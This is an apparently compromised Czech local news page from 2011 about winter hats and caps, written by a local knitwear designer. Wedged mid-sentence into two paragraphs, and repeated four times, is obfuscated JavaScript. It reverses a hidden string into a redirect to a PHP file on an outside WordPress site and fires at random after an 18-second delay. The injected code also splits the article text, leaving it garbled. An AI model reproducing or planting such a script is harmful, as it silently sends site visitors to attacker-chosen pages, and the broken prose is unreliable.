Žďár nad Sázavou, zdar nad sazavou, aktuality, klobouky, čepice, Dobřichovská
Rainbow page separator

Zima časem klobouků a čepic

Pátek, 25. listopadu 2011

klobouky-a-cepice-zdar-nad-sazavou-dana-dobrichovska-pleta-design-4Žďár nad Sázavou/ Kromě zimního kabátu, rukavic a šály patří k chladným měsícům roku také čepice a klobouky. Někteří z nás si jistě pamatují časy, kdy výběr zimních čepic byl opravdu bídný. Ta doba je již dávno pryč, pro["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tože dnešní obchody jsou naplněny nejnovějšími módními kousky. Ze současné široké nabídky si opravdu vybere každý.

Takový klobouk nebo čepice musí být ale funkční.  Měla by ochránit nejen hlavu, ale i uši před chladem a větrem. Z lidského těla odchází právě nemalé množství tepla i pokožkou hlavy.

klobouky-a-cepice-zdar-nad-sazavou-dana-dobrichovska-pleta-design-7V posledních pár letech se vrací móda klobouků a čepic a zažívá znovu svoji renesanci. Máme tak možnost své módní doplňky rozšířit i o ten["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to zajímavý sortiment, který v minulosti byl takřka nepostradatelný.. Proč nespojit funkčnost s krásou..

Připravila: Dana Dobřichovská, Pleta design Žďár nad Sázavou